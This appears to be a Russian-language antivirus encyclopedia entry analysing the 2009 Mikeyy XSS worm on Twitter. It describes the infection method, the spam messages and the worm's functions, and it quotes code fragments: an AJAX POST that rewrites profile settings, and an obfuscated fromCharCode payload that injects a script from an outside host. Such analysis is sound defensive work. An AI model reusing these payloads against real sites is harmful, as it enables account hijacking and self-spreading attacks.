Другие модификации: .a, .b, .c, .d, .f, .g, .h
Технические детали
Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.
Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.
Основной функционал червей содержится в трех функциях:
- XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
- Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
- Wait – содержит вредоносный функционал.
Рассылаемые сообщения:
"Twitter, freaking fix this already. >:[ - Mikeyy";
"Twitter, your community is going to be mad at you... - Mikeyy";
"This worm is getting out of hand Twitter. - Mikeyy";
"RT!! 4th gen #Mikeyy worm on the loose! Click here to protect
yourself: http://tinyurl.com/cojc6s";
"This is all Twitters fault! Don`t blame Mikeyy!!";
"ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT:
http://bit.ly/4ywBID";
"How TO remove new Mikeyy worm! RT!! http://bit.ly/yCL1s";
В данном варианте у пользователей изменяется параметр user[name] :
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Sa ve");
Значение изменяемого параметра вычисляется в следующем фрагменте:
var randomXSS=new Array();
randomXSS[0] = `" title script document.write(String.fromCharCode(60,115,99,114,105,112,116,3
2,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,10
0,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,11 4,105,112,116,62));/script`;
var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];
var xss = urlencode(genXSS);
Это приводит к добавлению к странице пользователя следующей ссылки на скрипт:
http://www.stalkdaily.com/ajax.js
Также червь изменяет параметры пользователя на следующие:
user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++; user[profile_background_color]="+urlencode(`##Mikeyy`)+"
в результате чего у зараженного пользователя меняется имя аккаунта и фон его страницы.
Источник: viruslist.com.
|
